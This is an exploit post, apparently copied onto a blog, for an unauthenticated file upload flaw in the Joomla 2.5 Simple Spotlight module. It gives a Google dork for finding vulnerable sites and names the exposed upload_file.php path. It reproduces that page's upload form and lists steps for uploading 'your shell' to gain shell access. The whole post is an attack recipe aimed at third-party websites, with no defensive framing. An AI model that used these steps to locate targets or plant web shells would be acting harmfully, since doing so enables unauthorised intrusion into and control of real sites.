Joomla 2.5 Modules Simple Spotlight Upload Shell [Old 3xploi7]


#- Title: Joomla 2.5 Modules Simple Spotlight Upload Shell
#- Author: BL4ckc0d1n6
#- Published : 3-22-2012
#- Developer : joomla
#- Link Download : extensions.joomla .org/extension/simple-spotlight
#- Price : Free
#- Google Dork: inurl:/modules/mod_ppc_simple_spotlight/
#- Fixed in Version : -
#- Tested on : windows
=======================================================
-- Proof Of Concept --

Description : 

Simple spotlight is a jQuery image rotator with navigation. You can have up to 20 images with links. You can turn off the navigation and choose between 27 effects for transition. It also has 5 button styles and a shadow effect.


Vulnerability : 
site/path/modules/mod_ppc_simple_spotlight/elements/upload_file.php

Result : 13k +

When Vuln : 







iSource :


<script language="JavaScript">
function refreshParent() {
window.close();
if (window.opener && !window.opener.closed) {
window.opener.location.reload();
}
}
</script>
<form name="newad" method="post" enctype="multipart/form-data" action="">
<table>
<tr>
<td>
<input type="file" name="image">
</td>
</tr>
<tr>
<td>
<input name="Submit" type="submit" value="Upload image">
<input type="button" value="Close" onclick="javascript: refreshParent()">
</td>
</tr>
</table>
</form>



~ Method ~

1. Site .com
2. add 3xploi7 = /modules/mod_ppc_simple_spotlight/elements/upload_file.php
3. Ex : Site .com/modules/mod_ppc_simple_spotlight/elements/upload_file.php
4. Upload your shell / imges / html file

If Succesfully   > 







Shell Acces ? Click Here 

Tidak ada komentar

Diberdayakan oleh Blogger.